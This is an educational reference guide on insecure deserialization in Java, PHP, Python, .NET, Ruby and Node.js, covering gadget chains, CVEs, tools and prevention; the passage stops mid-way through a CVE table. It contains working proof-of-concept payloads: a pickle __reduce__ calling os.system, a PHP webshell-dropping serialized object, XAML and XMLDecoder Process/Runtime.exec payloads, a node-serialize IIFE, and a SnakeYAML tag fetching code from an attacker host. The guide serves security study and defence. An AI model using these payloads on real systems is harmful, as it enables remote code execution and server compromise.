Comprehensive Insecure Deserialization Guide#
A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 47 research sources.
Table of Contents#
- Fundamentals
- Attack Surface & Entry Points
- Java Deserialization
- PHP Object Injection
- Python Pickle & ML Pipelines
- .NET Deserialization
- Ruby Marshal & YAML
- Node.js Deserialization
- YAML & JSON Format Attacks
- Gadget Chains Explained
- Real-World CVEs & Exploitation Chains
- Tools & Automation
- Detection & Static Analysis
- Prevention & Mitigation
- Signature & Gadget Quick Reference
1. Fundamentals#
Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way.
Three broad impact classes:
| Class | Description | Canonical Example |
|---|---|---|
| Remote Code Execution | Attacker reaches a native sink (Runtime.exec, os.system, eval, system()) through a gadget chain | Java CommonsCollections → Runtime.exec |
| Object Injection / Logic Abuse | Attacker smuggles an unexpected object type that alters control flow, writes files, or performs SQLi | PHP __destruct → file_put_contents shell upload |
| Denial-of-Service | Recursive object graphs, billion-laughs, hash collision, resource exhaustion | SnakeYAML billion-laughs, Java HashMap hash DoS |
Why it persists: the vulnerability is in data, not code. The sink (readObject, unserialize, pickle.loads, Marshal.load, BinaryFormatter.Deserialize) looks correct in isolation; the bug is the trust boundary around what reaches it. Static analyzers flag the call but cannot reason about whether the bytes arriving were produced by trusted code.
The gadget chain abstraction: RCE is rarely achieved in a single hop. Instead, attackers assemble a graph of “gadgets” — legitimate classes already on the application classpath that, when deserialized in a particular shape, cause method dispatch to cascade until a dangerous sink is reached. The application doesn’t need to ship malicious code; it only needs to load a library that contains usable gadgets.
Key insight: you cannot patch your way out of this. Every patched gadget chain is followed by another built from different links on the same classpath. The only durable fix is to eliminate native deserialization of untrusted input entirely.
2. Attack Surface & Entry Points#
Where serialized blobs cross trust boundaries#
| Category | Examples |
|---|---|
| HTTP parameters | Base64-encoded state, token, data, session, view, cache params |
| Cookies | Session cookies, remember_me, flash messages, CSRF tokens encoding objects |
| Hidden form fields | ASP.NET __VIEWSTATE, Rails _session_id, JSF javax.faces.ViewState |
| Cache layers | Memcached/Redis blobs, Rails cache store with Marshal, Django pickle sessions |
| Message queues | RabbitMQ, Kafka, ActiveMQ, SQS, ZeroMQ payloads between services |
| RMI / RPC | Java RMI registry, JMX, JNDI, CORBA, DRb |
| File uploads | .ser, .rdb, .pkl, .joblib, .pt, .phar model/checkpoint files |
| WebSockets / IPC | Distributed serving frameworks passing pickle or Marshal over sockets |
| Email headers | X-SerializedObject style custom headers, WSDL SOAP bodies |
| Log ingestion | Log4j-style object injection, Graylog inputs, serialized stack traces |
| Database columns | Opaque BLOB/bytea fields holding serialized objects |
Sink functions by language#
Java: ObjectInputStream.readObject(), XMLDecoder.readObject(),
XStream.fromXML(), Yaml.load() (SnakeYAML),
Jackson ObjectMapper with enableDefaultTyping(),
Kryo.readObject(), Hessian, Castor, Burlap
PHP: unserialize(), phar:// wrapper (file ops trigger), yaml_parse(),
Laminas Zend_Serializer, Symfony Serializer XML
Python: pickle.loads/load, cPickle, joblib.load, torch.load,
numpy.load(allow_pickle=True), pyyaml yaml.load (unsafe),
shelve, dill.loads, marshal.loads, jsonpickle.decode
.NET: BinaryFormatter.Deserialize, SoapFormatter, LosFormatter,
ObjectStateFormatter, NetDataContractSerializer,
JavaScriptSerializer (TypeNameHandling),
Json.NET with TypeNameHandling != None, DataContractSerializer,
XmlSerializer with arbitrary types
Ruby: Marshal.load, YAML.load (pre-Psych 4), JSON.parse(create_additions:true),
Oj.load (default mode), Rails cache store :marshal
Node.js: node-serialize unserialize(), funcster, serialize-javascript
(with IIFE), eval-based JSON revivers
Content-type & magic byte fingerprints#
| Format | Signature | Notes |
|---|---|---|
| Java serialized | AC ED 00 05 (rO0 base64) | ObjectOutputStream header |
| PHP serialized | O:<num>:"ClassName":<num>:{...} | Also a:, s:, i: primitives |
| Python pickle | 80 04 / 80 05 (proto 4/5) | Starts with PROTO opcode |
| .NET BinaryFormatter | 00 01 00 00 00 FF FF FF FF | SerializationHeaderRecord |
| Ruby Marshal | 04 08 | Major 4, minor 8 |
| ASP.NET ViewState | /wEP, /wEX base64 prefix | Deserialized server-side |
| Phar | <?php __HALT_COMPILER(); manifest | PHP-parsed metadata |
3. Java Deserialization#
The core primitive#
Any class implementing java.io.Serializable can be reconstructed by ObjectInputStream.readObject(). A class may define a private readObject(ObjectInputStream in) method that is invoked during deserialization — this is where custom logic runs, and it is the primary entry ramp for gadget chains.
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject(); // attacker-controlled byte stream
The default readObject will happily deserialize any class on the classpath that implements Serializable. There is no type filter. The “expected type” cast ((User) ois.readObject()) happens after the object graph is fully reconstructed and all side effects have fired.
Classic sink entry points#
| Sink | Library | Notes |
|---|---|---|
ObjectInputStream.readObject | JDK core | Foundation of all classic Java deserialization bugs |
XMLDecoder.readObject | java.beans | Pure XML RCE; constructor chains via <object class=...> |
XStream.fromXML | XStream | Whitelist-by-default only since v1.4.18 |
Yaml.load | SnakeYAML (<2.0) | Instantiates arbitrary classes from !! tags |
ObjectMapper.readValue + enableDefaultTyping | Jackson | Polymorphic deserialization via @class hints |
Kryo.readObject / readClassAndObject | Kryo | Default config registers arbitrary classes |
Hessian.getInputStream | Hessian/Burlap | Used in older Spring Remoting, Caucho |
JNDI lookup | JNDI/LDAP/RMI | Log4Shell’s cousin — remote class loading |
Gadget chain anatomy (CommonsCollections1)#
The canonical chain, dissected from ysoserial’s CommonsCollections1.java, illustrates the building blocks seen in almost every Java chain:
- Entry gadget (
readObjecttrigger).sun.reflect.annotation.AnnotationInvocationHandlerhas areadObjectmethod that callsmemberValues.entrySet(). IfmemberValuesis a dynamicProxybacked by anotherAnnotationInvocationHandler,entrySet()routes throughInvocationHandler.invoke(). - Bridge gadget (method dispatch). The inner
AnnotationInvocationHandler.invoke()callsmemberValues.get(name). WhenmemberValuesis aLazyMap,get()invokes the map’sfactory.transform(key)for missing keys. - Transform chain (
ChainedTransformer). AChainedTransformerpipes the initial input through an array ofTransformerinstances, each feeding the next:ConstantTransformer(Runtime.class)— returns the Runtime class objectInvokerTransformer("getMethod", ..., {"getRuntime", new Class[0]})— reflectively fetches thegetRuntimemethodInvokerTransformer("invoke", ..., {null, new Object[0]})— invokes it, returning aRuntimeinstanceInvokerTransformer("exec", ..., execArgs)— finally callsRuntime.exec(cmd)
The sink is reached not by any single class being malicious, but by abusing reflection primitives exposed in a widely-used utility library.
Why patching individual gadgets fails#
The AnnotationInvocationHandler entry was patched in JDK 8u72 — memberValues must now be a LinkedHashMap. But LazyMap, InvokerTransformer, and ChainedTransformer live in commons-collections and are not part of the JDK. CommonsCollections5 reused the same backend chain but substituted a new entry ramp (BadAttributeValueExpException.readObject calling toString() on an arbitrary object). The backend survived; only the front door changed.
This is the defining pattern of Java deserialization defense: you cannot remove the gadgets (they’re in third-party jars), you cannot remove the sink (it’s in the JDK), and every patched entry is followed by another discovered entry reusing the same backend.
Well-known gadget chain families (ysoserial)#
| Chain | Trigger | Backend | Requires |
|---|---|---|---|
CommonsCollections1 | AnnotationInvocationHandler.readObject | LazyMap + ChainedTransformer | commons-collections 3.1, JDK ≤ 8u71 |
CommonsCollections2 | PriorityQueue.readObject → compare | TransformingComparator | commons-collections4 4.0 |
CommonsCollections5 | BadAttributeValueExpException.readObject → toString | LazyMap | commons-collections 3.1, any JDK |
CommonsCollections6 | HashSet.readObject → hashCode | LazyMap | commons-collections 3.1, any JDK |
CommonsBeanutils1 | PriorityQueue → BeanComparator | PropertyUtils.getProperty → reflection | commons-beanutils |
Groovy1 | ConvertedClosure.invoke | MethodClosure("execute") | Groovy ≤ 2.4.3 |
Spring1, Spring2 | ObjectFactory proxy chains | JDK only + spring-core | Older Spring |
Hibernate1, Hibernate2 | ComponentType.getPropertyValue | JDK reflection | Hibernate |
JRMPClient / JRMPListener | RMI remote class loading | Outbound JRMP callback | Network egress |
URLDNS | HashMap.readObject → URL.hashCode | DNS lookup | Useful as blind probe (no RCE) |
ROME, Click1, Clojure, JBossInterceptors1, C3P0, MozillaRhino1, Myfaces1, Wicket1 | Various | Various | Application-specific |
SnakeYAML (CVE-2022-1471)#
Before SnakeYAML 2.0, Yaml.load() was effectively equivalent to calling ObjectInputStream.readObject for any class on the classpath. YAML tags like !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker/"]]]] could instantiate a ScriptEngineManager pointed at a remote META-INF/services file, loading arbitrary code via JAR SPI. The maintainers initially declined to change defaults, arguing documentation was sufficient — eight CVEs later, 2.0 finally made SafeConstructor the default.
Jackson polymorphic deserialization#
Jackson is safe when deserializing fixed types. It becomes dangerous when ObjectMapper.enableDefaultTyping() is set or classes use @JsonTypeInfo(use = Id.CLASS). The JSON then carries a @class (or @type) hint telling Jackson which concrete class to instantiate, converting a JSON endpoint into an arbitrary gadget instantiation primitive. Blocklists (SubTypeValidator) are maintained by Jackson maintainers but have been bypassed repeatedly.
4. PHP Object Injection#
The unserialize() primitive#
PHP’s serialize()/unserialize() encode the class name, property names, and property values of any object. On deserialization, PHP instantiates the named class with the encoded property values directly assigned — the constructor is not invoked. Instead, specific “magic methods” fire automatically:
| Magic Method | When It Fires |
|---|---|
__wakeup() | Immediately after unserialization |
__destruct() | When the object is garbage collected (end of request) |
__toString() | When the object is cast to string (comparisons, echo, string concat) |
__call() | When an undefined method is invoked |
__get() / __set() | When undefined properties are accessed |
__invoke() | When the object is called as a function |
__unserialize() (PHP 7.4+) | Replaces __wakeup if defined |
Serialized string format#
O:12:"LoggingClass":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:20:"<?php evilCode(); ?>";}
O:12:"LoggingClass"— object of classLoggingClass(name length 12)2:{...}— two propertiess:8:"filename"— string key of length 8s:9:"shell.php"— string value of length 9
Property-Oriented Programming (POP) chains#
Like Java gadget chains, but chained through PHP magic methods and method calls in class __destruct / __wakeup / __toString hooks. The Sonar example illustrates the minimal case — a LoggingClass whose destructor writes $this->content to $this->filename. An attacker serializes an instance with filename = "shell.php" and content = "<?php system($_GET[0]); ?>", and the destructor drops a webshell at request end.
Real POP chains are longer. Typical primitives:
- A destructor that calls
$this->obj->method()where$this->objis another attacker-chosen class - A
__toStringthat builds a SQL query or file path from properties - A
__wakeupthat callseval,include, orfile_put_contentson serialized properties - A
__callthat forwards tocall_user_func_array($this->callback, $this->args)
PrestaShop, Drupal (CVE-2019-6340), Joomla, Magento, WordPress core, Pydio, phpBB, and SuiteCRM all had disclosed POP chains reaching RCE.
Phar deserialization (pre-PHP 8)#
A subtle variant: PHP’s phar:// stream wrapper parses PHAR metadata via unserialize() when any file operation (including file_exists, filesize, is_dir) touches a PHAR file path. An attacker who can:
- Upload a file of any extension containing PHAR metadata (the PHAR format tolerates arbitrary headers — JPEG EXIF, GIF comments, etc.)
- Trigger a file operation on
phar://uploads/avatar.jpg/foo
…reaches unserialize without ever calling it directly. The avatar upload path becomes an RCE. PHP 8.0 removed implicit metadata unserialization; earlier versions remain exposed.
Common PHP deserialization entry points#
- Laravel cookie encryption (when APP_KEY leaks, serialized payloads pass integrity)
- WooCommerce and WordPress meta fields stored as serialized PHP
- Yii
restoreGET, CodeIgniter session library (with encryption disabled) - Symfony
Cookie/Statecomponents in older versions - Legacy Zend Framework
Zend_Serializer
5. Python Pickle & ML Pipelines#
Pickle is a stack VM, not a data format#
pickle.loads() executes a small stack-based virtual machine. One of its opcodes, REDUCE, pops a callable and an argument tuple from the stack and calls them. Any object that defines __reduce__() returning (callable, args) becomes a function call when loaded:
class P:
def __reduce__(self):
return (os.system, ("id",))
pickle.dumps(P()) # -> bytes that call os.system("id") on load
There is no blocklist, no sandbox, no way to intercept the call. The Python docs warn about this in a yellow box that approximately nobody reads because the code that loads pickle files is written by ML engineers, not security engineers.
The ML pipeline problem#
Every ML tutorial ends with pickle.dump(model, f) / pickle.load(f). Higher-level libraries hide pickle under innocuous names:
| Function | Actually Calls |
|---|---|
joblib.load(path) | pickle.load |
torch.load(path) (pre-2.6 default) | pickle.load over tensor data |
numpy.load(path, allow_pickle=True) | pickle.load |
dill.load | pickle with extra object support |
cloudpickle.load | pickle with closure support |
HuggingFace transformers older models | pickle under the hood |
ZeroMQ recv_pyobj() | pickle.loads on wire bytes |
A code reviewer sees joblib.load(model_path) and approves it. The reviewer does not ask where model_path came from. In a typical pipeline the file was downloaded by a training service, pushed to S3, cached by a registry, and finally loaded by inference — the chain of custody is invisible at the load site.
CVE-2025-32444 (vLLM, CVSS 10.0)#
vLLM’s Mooncake integration for distributed KV-cache transfer called recv_pyobj() on ZeroMQ sockets bound to 0.0.0.0. Any host on the network could ship a pickle payload and get RCE. The code looked correct — ZMQ is a legitimate IPC mechanism and recv_pyobj is a legitimate API. The bug is that “structured message between trusted workers” silently became “unauthenticated pickle deserialization endpoint.”
LightLLM (CVE-2026-26220)#
Same vulnerability class, WebSocket-based. The prefill-decode disaggregation system deserialized incoming binary frames with pickle.loads(). A nonce-based auth check existed but the default nonce was an empty string — falsy in Python, so the check was skipped. The server explicitly refused to bind to localhost, guaranteeing network exposure.
data = await websocket.receive_bytes()
obj = pickle.loads(data) # untrusted WebSocket binary frame
There was no reason to use pickle for this — the payload was worker registration metadata (strings, ints, dicts). JSON or MessagePack would have worked fine. Pickle was the path of least resistance in Python and nobody thought about it.
PickleScan is fundamentally fragile#
Picklescan (used by HuggingFace) parses pickle bytecode and matches against a blocklist of dangerous imports. The problem is architectural: pickle is Turing-complete, and parsing divergence between picklescan and PyTorch creates bypass primitives:
- ZIP flag bit flipping (Sonatype) — PyTorch’s ZIP reader accepts flipped general-purpose bit flags that picklescan silently skips.
- Subclass imports (JFrog) — using a subclass of a blocklisted module downgrades picklescan’s “Dangerous” verdict to “Suspicious” while still executing fine.
- Non-standard file extensions — loader accepts it, scanner ignores it.
- Gadget diversity — academic research (PickleBall / Brown University CCS 2025) identified 133 exploitable function gadgets across stdlib and common ML deps, achieving near-100% scanner bypass.
Even the best-performing scanner in the PickleBall study let 89% of gadgets through. This is not fixable within the current approach.
torch.load: incomplete migration#
Before PyTorch 2.0, torch.load(path) unpickled the entire checkpoint with no restrictions. 2.0 added weights_only=True; 2.6 finally changed the default. But the installed base of unsafe patterns is enormous — old tutorials, copy-pasted notebooks, and vendor scripts that pin PyTorch to earlier versions still exist in production.
Rule for review: torch.load() without weights_only=True is a finding unless the checkpoint source is fully trusted internal infrastructure with integrity verification.
Supply-chain vector#
Model weights are distributed as files. A 2025 Brown University study found roughly half of popular HuggingFace repositories still contain pickle-backed models, including releases from Meta, Google, Microsoft, NVIDIA, and Intel. Attack patterns:
- Compromised account — push new weights, every downstream pull runs the payload
- Typosquatting —
bert-base-uncasedvsbert_base_uncased - Malicious fine-tunes — functional model with payload in serialization wrapper
- Tensor steganography — hiding callable references in weight perturbations small enough not to affect accuracy
PyYAML’s yaml.load#
yaml.load(data) without an explicit Loader defaults to FullLoader in modern PyYAML, which disallows arbitrary Python object construction. But enormous amounts of legacy code pass Loader=yaml.Loader (the unsafe loader) or use pre-5.1 versions where the default was unsafe. The canonical payload:
!!python/object/apply:os.system ["id"]
Docling RCE (CVE-2026-24009) — a shadow vulnerability introduced into Docling via an unpinned PyYAML version that regressed to accepting arbitrary tags in one code path. The fix was to switch to yaml.safe_load unconditionally.
6. .NET Deserialization#
The dangerous formatters#
.NET ships with multiple serialization APIs; some are safe, several are explicitly marked insecure:
| Formatter | Status | Notes |
|---|---|---|
BinaryFormatter | Insecure | Microsoft: “cannot be made secure”; obsoleted in .NET 5+ |
SoapFormatter | Insecure | Same type-loading model as BinaryFormatter |
NetDataContractSerializer | Insecure | Preserves .NET types, loads arbitrary |
ObjectStateFormatter | Insecure | ASP.NET ViewState backend |
LosFormatter | Insecure | Legacy ASP.NET |
JavaScriptSerializer with SimpleTypeResolver | Insecure | Allows __type hints |
Json.NET with TypeNameHandling != None | Dangerous | $type property instantiates arbitrary classes |
XmlSerializer with unrestricted types | Dangerous | Requires declared types at compile time; safer if constrained |
DataContractSerializer | Safer | Known-types list enforced |
System.Text.Json | Safe (default) | No polymorphic default |
Microsoft’s official guidance: “BinaryFormatter is insecure and can’t be made secure.” Period. There is no allowlist configuration that makes it safe against untrusted input.
Sink patterns#
// Classic vulnerable pattern
var fmt = new BinaryFormatter();
var obj = fmt.Deserialize(request.InputStream); // RCE
// Json.NET danger
var settings = new JsonSerializerSettings {
TypeNameHandling = TypeNameHandling.All // or Objects/Arrays
};
var obj = JsonConvert.DeserializeObject<object>(json, settings);
Known .NET RCE gadget families (ysoserial.net)#
| Gadget | Works Against | Notes |
|---|---|---|
TypeConfuseDelegate | BinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializer | Sorts a list with a MulticastDelegate confused into calling Process.Start |
ActivitySurrogateSelector | BinaryFormatter, SoapFormatter | Abuses surrogate selector to compile and run C# at deserialization time |
ActivitySurrogateSelectorFromFile | Same | Variant that loads an assembly from disk |
WindowsIdentity | BinaryFormatter, NetDataContractSerializer | Uses WindowsIdentity deserialization callback |
RolePrincipal | Same | Security principal gadget |
DataSet | BinaryFormatter, SoapFormatter, XmlSerializer with DataSet | System.Data.DataSet XML type confusion |
SessionSecurityToken | Json.NET, NetDataContractSerializer | WIF token gadget |
ObjRef (TransparentProxy) | Remoting | .NET Remoting cross-AppDomain trick |
TextFormattingRunProperties | Json.NET | XAML-embedded ObjectDataProvider reach to Process.Start |
PSObject | BinaryFormatter | PowerShell object gadget |
XAML ObjectDataProvider — the universal .NET gadget#
The System.Windows.Data.ObjectDataProvider class takes a target type, a method name, and method parameters, and invokes them. Any formatter that can reach XAML parsing (directly or via TextFormattingRunProperties, via XamlReader.Parse, or via Json.NET’s XAML types) can achieve RCE with a single object. It’s the .NET equivalent of InvokerTransformer.
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:s="clr-namespace:System;assembly=mscorlib"
xmlns:c="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="x" ObjectType="{x:Type c:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<s:String>cmd.exe</s:String>
<s:String>/c calc</s:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
ASP.NET ViewState#
ViewState is a base64-encoded blob sent in a hidden __VIEWSTATE form field carrying page control state. It is deserialized server-side by ObjectStateFormatter. Protection relies on <machineKey> HMAC validation (when enabled) and encryption. Leak or brute-force of machineKey turns ViewState into an unauthenticated RCE sink — ysoserial.net’s TextFormattingRunProperties gadget is the canonical payload.
This is exactly the attack surface behind the SharePoint ToolShell campaign (CVE-2025-53770) and related CVE-2021-27076 “replay-style” attack. A custom webshell parses parameters from VIEWSTATE, enabling insecure deserialization against on-prem SharePoint. Over 4,600 compromise attempts against 300+ organizations were observed in one week of July 2025.
Defensive must-do: rotate ASP.NET machine keys; enable ValidationMode="3.5" and MAC validation; do not disable ViewState MAC.
Notable .NET deserialization CVEs#
| CVE | Product | Formatter |
|---|---|---|
| CVE-2020-25258 | Hyland OnBase | BinaryFormatter |
| CVE-2021-27076 | SharePoint (replay-style) | ObjectStateFormatter/ViewState |
| CVE-2021-29508 | Wire (Proto.Actor) | BinaryFormatter |
| CVE-2022-21969 | Exchange Server | BinaryFormatter via MAPI |
| CVE-2023-3513 | Razer Central Service | BinaryFormatter IPC |
| CVE-2023-5914 | CentralSquare | BinaryFormatter |
| CVE-2023-6184 | Third-party ASP.NET app | ViewState |
| CVE-2025-53770 | SharePoint (ToolShell) | ViewState |
| CVE-2026-20963 | SharePoint | Deserialization RCE |
| CVE-2026-26114 | SharePoint | Deserialization RCE |
7. Ruby Marshal & YAML#
Marshal.load — a decade of whack-a-mole#
Ruby’s Marshal module is the language’s native binary serialization format. Passing any untrusted bytes to Marshal.load should be treated as arbitrary code execution. The vulnerability was first publicly discussed in a 2013 Ruby bug tracker issue by Charlie Somerville (now Hailey) and has resisted fixes ever since.
class UserRestoreController < ApplicationController
def show
user_data = params[:data]
deserialized = Marshal.load(Base64.decode64(user_data))
render plain: "Restored: #{deserialized.inspect}"
end
end
Gadget chain timeline#
| Year | Gadget / Technique | Target |
|---|---|---|
| 2013 | Initial Marshal warning issue | Ruby 2.0 |
| 2016 | Phrack #69 — Rails 3/4 Marshal exploit | Rails ≤ 4.0 |
| 2018 | Luke Jahnke — “Ruby 2.x Universal RCE Deserialization Gadget Chain” (elttam) | Ruby 2.x |
| 2019 | CVE-2019-5420 (Rails 5.2 Marshal) | Rails 5.2 |
| 2019 | Etienne Stalmans — YAML.load universal RCE | Ruby 2.x + Psych |
| 2021 | William Bowling — “Universal Deserialisation Gadget for Ruby 2.x–3.x” | Ruby 2.x/3.x |
| 2022 | William Bowling — “Round Two” updated gadget | Ruby 3.0/3.1 |
| 2024 | Alex Leahu (Include Security) — Rails library-based chains | Rails |
| 2024 | GitHub Security Lab — JSON/XML/YAML/Marshal CodeQL queries + PoCs | Multi-format |
| 2024 | Luke Jahnke — Ruby 3.4 universal RCE + Gem::SafeMarshal escape | Ruby 3.4-rc1 |
The pattern: each patch closes one reachable entry from readObject-equivalent, the gadget backend survives, researchers find another entry, repeat. Ruby 3.1 made YAML’s safe_load the default (via Psych 4). Ruby 3.2 patched Marshal gadgets. Ruby 3.4 was released with yet another chain barely averted.
The Gem::SpecFetcher → Runtime chain (2024)#
The current canonical Ruby Marshal universal chain routes through Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::RequestSet, Gem::Resolver::SpecSpecification, Gem::Source::Git, and Gem::Resolver::GitSpecification. The chain ends in shell metacharacter expansion via a git invocation with an attacker-controlled repository name containing backticks:
any.zip → reference field contains `$(id > /tmp/pwn)` → git clone executes it
The gadget lives in RubyGems itself — core Ruby — so the only way to patch it is to change RubyGems internals. Doyensec and Trail of Bits have both found successive variants during RubyGems.org audits.
Where Marshal lurks in real apps#
- Rails cache store with
:marshal(the default prior to Rails 7.1) - Rails session store in legacy configurations
- Background job backends — Resque, Sidekiq (with Marshal coder), DelayedJob
- Cookie-based flash messages in older Rails versions
- DRb (distributed Ruby) — entire mechanism is Marshal over sockets
- File-based Ruby object storage —
.rb.cache,.marshal,.bin
YAML.load and Psych#
Psych 4 (Ruby 3.1+) made YAML.load == YAML.safe_load by default. YAML.unsafe_load exists for compatibility. Pre-3.1 code calling YAML.load(user_data) is directly exploitable via !ruby/object: tags that instantiate arbitrary classes:
--- !ruby/object:Gem::Installer
i: x
Stalmans’s 2019 chain produces ~3 KB of YAML reaching Runtime.exec-equivalent via ERB template evaluation in a Gem::Installer-chained setter.
JSON.parse(create_additions: true)#
Ruby’s JSON.parse supports an opt-in mode where {"json_class": "SomeClass", ...} triggers SomeClass.json_create({...}). If any class on the load path defines a vulnerable json_create, this is an RCE path. Oj’s “default mode” enables similar behavior by default.
8. Node.js Deserialization#
The node-serialize footgun#
The npm package node-serialize serializes objects including functions — by wrapping functions as "_$$ND_FUNC$$_function () { ... }" strings and evaling them on deserialize. Passing untrusted input to serialize.unserialize() is direct RCE via IIFE:
const payload = {
rce: "_$$ND_FUNC$$_function(){require('child_process').exec('id',function(e,s){console.log(s)});}()"
};
serialize.unserialize(JSON.stringify(payload));
The trailing () in the function string causes immediate invocation. CVE-2017-5941 covered the original disclosure; the package remains on npm with warnings.
funcster, serialize-javascript#
Similar patterns; serialize-javascript is relatively safer when used to produce output for client consumption but dangerous if the output is deserialized via eval on the server with attacker control.
Prototype pollution adjacency#
Node.js deserialization bugs frequently co-occur with prototype pollution (__proto__ key injection via Object.assign, lodash.merge, JSON.parse + merge). A polluted prototype can modify the behavior of deserialization functions used downstream.
YAML in Node.js#
js-yaml had unsafe loading in versions prior to 4.0. yaml package default is safe. Custom schemas and CORE_SCHEMA with type handlers can reintroduce unsafe behavior.
Main sinks to grep for#
serialize.unserialize(...)
funcster.deepDeserialize(...)
eval(req.body.something)
new Function(req.body.something)
vm.runInNewContext(untrusted)
js-yaml load() (pre-4.0)
node-phantom, PhantomJS IPC
9. YAML & JSON Format Attacks#
YAML is not “just data”#
Modern YAML parsers support typed tags (!!, !, !<...>) that trigger class instantiation in the host language:
| Language | Unsafe Loader | Tag Syntax |
|---|---|---|
| Python (PyYAML <5.1) | yaml.load | !!python/object/apply:os.system ["id"] |
| Java (SnakeYAML <2.0) | Yaml().load | !!javax.script.ScriptEngineManager [...] |
| Ruby (Psych <4.0) | YAML.load | !ruby/object:Gem::Installer |
| .NET (YamlDotNet) | Untyped deserializer | !System.Diagnostics.Process |
| Go (yaml.v2 custom unmarshalers) | Type-dispatched | Typically safe unless reflective |
The maintainer response pattern is often to document the danger rather than change defaults, which is why CVEs in YAML libraries keep landing.
CVE-2022-1471 (SnakeYAML)#
After at least eight prior related CVEs, SnakeYAML was finally given an umbrella CVE for “insecure by default.” SnakeYAML <2.0’s Yaml().load() accepts !! tags that instantiate arbitrary Java classes. A reachable YAML parser in any Spring/Jackson/REST ingestion path becomes RCE without authentication. Fixed in 2.0 by making SafeConstructor the default.
CVE-2026-24009 (Docling RCE via PyYAML)#
A shadow vulnerability: Docling indirectly loaded PyYAML in a path that used yaml.load without an explicit safe loader, regressing when a dependency pin lapsed. The attack surface was document ingestion — upload a crafted document containing a YAML manifest with !!python/object/apply, and Docling parsed it on the server.
JSON deserialization dangers#
Plain JSON isn’t directly vulnerable — JSON grammar has no type tags. But:
- Polymorphic deserializers (Jackson
enableDefaultTyping, Json.NETTypeNameHandling, fastjsonautoType) add a@class/$type/@typefield that reintroduces type-driven instantiation. - jsonpickle (Python) stores Python objects in JSON and round-trips them through pickle semantics on load.
- Oj (Ruby) in
:objectmode preserves Ruby class info. - JSON.parse in Ruby with
create_additions: truedispatches tojson_create.
Fastjson (Java) is a notable case: com.alibaba.fastjson.JSON.parseObject(str, Object.class) with autoType enabled has had a continuous stream of RCE chains since 2017 (JdbcRowSetImpl JNDI chain being the canonical one).
XML deserialization#
XMLDecoder (Java) and XML-based formatters in .NET (SoapFormatter, XamlReader.Parse) are equivalent in power to their binary cousins. java.beans.XMLDecoder.readObject parses XML that directly specifies method invocations:
<java>
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<string>calc</string>
</void>
</object>
</java>
XStream’s default configuration before 1.4.18 allowed similar arbitrary-class instantiation; dozens of CVEs (CVE-2021-21344 through CVE-2021-39154 and onward) document the gadget chain parade.
10. Gadget Chains Explained#
The chain-of-method-dispatch abstraction#
A gadget chain is a sequence of class method invocations connected by field references, where:
- Entry gadget — a class whose
readObject,__wakeup,__destruct,__reduce__, etc. is called automatically during deserialization and does something more than set fields. - Relay gadgets — classes whose methods (called by the previous gadget) make further method calls on attacker-controlled fields, propagating control flow.
- Sink gadget — terminal class whose invoked method reaches a native “do something dangerous” primitive (
exec,eval,system, file write, reflection invoke, HTTP request, deserialize-again).
The attacker picks an object type for each field so that the “dynamic dispatch” at each link points to the next gadget. The chain is then serialized and submitted to the sink.
Why chains exist (the Russian doll metaphor)#
No sane developer writes readObject to call Runtime.exec directly. But developers write readObject methods that call this.field.someMethod(), where someMethod is an interface method. The JVM / PHP / Python runtime resolves someMethod at dispatch time based on the actual class of this.field. Swap this.field for a LazyMap or an InvokerTransformer and you’ve changed the target of the call without changing the call site.
Gadget hunting methodology#
- Seed set: find all classes implementing the deserializable marker (
java.io.Serializable, PHP__wakeup/__destruct, Python__reduce__, .NET[Serializable]). - Entry set: filter to classes whose deserialization-time methods do more than field assignment — call any method on a field, any reflection API, any
eval-equivalent. - Graph expansion: for each entry, model “what methods does this call on fields I control?” Traverse the call graph backward from known sinks (
Runtime.exec,eval,system,include). - Constraint solving: each edge has type requirements (the field must be assignable to an interface that has the called method); solve for a feasible object graph.
- Serializability filter: every node in the graph must itself be deserializable by the target format.
Automated gadget discovery tools#
| Tool | Language | Approach |
|---|---|---|
| Gadget Inspector | Java | Bytecode analysis; finds call-graph paths from readObject to sinks |
| JOOGIE | Java | Static data-flow analysis |
| SerHyBrid | Java | Hybrid static/dynamic exploration |
| PHPGGC | PHP | Curated chain database with generator CLI |
| Fickling | Python | Pickle bytecode parser, static analyzer, and gadget constructor |
| PickleBall | Python | Per-library policy generator, not discovery |
| Freddy (Burp) | Multi | Deserialization payload injector with ~30 known chains |
| ysoserial / ysoserial.net | Java / .NET | Payload generator for ~30 known Java chains, ~15 .NET |
| marshalsec | Java | Non-JDK serialization formats (Jackson, XStream, Kryo, Hessian, JYaml, Red5) |
| GadgetProbe | Java | DNS-based blind probing to fingerprint classpath classes |
The “unpatchable” property#
A gadget chain is a path through the classpath. Patching one class on the path closes that specific path but leaves every other path open. The set of gadgets on a modern enterprise Java classpath is combinatorially enormous — any library that does reflection, method dispatch on attacker-controlled fields, or custom deserialization logic is a potential source of gadgets. This is why the only durable fix is to not deserialize untrusted data in native formats.
11. Real-World CVEs & Exploitation Chains#
Java#
| CVE | Product | Chain / Trigger |
|---|---|---|
| CVE-2015-4852 | WebLogic T3 | CommonsCollections over IIOP |
| CVE-2015-7501 | JBoss/Jenkins | CommonsCollections via /invoker/JMXInvokerServlet |
| CVE-2016-1000031 | Apache Commons FileUpload | DiskFileItem reflective file write |
| CVE-2017-5638 | Struts2 (S2-045) | OGNL via Content-Type (not pure deser, related family) |
| CVE-2017-10271 | WebLogic | XMLDecoder on WLS-wsat /wls-wsat/CoordinatorPortType |
| CVE-2018-7489 | Jackson-databind | c3p0 gadget via default typing |
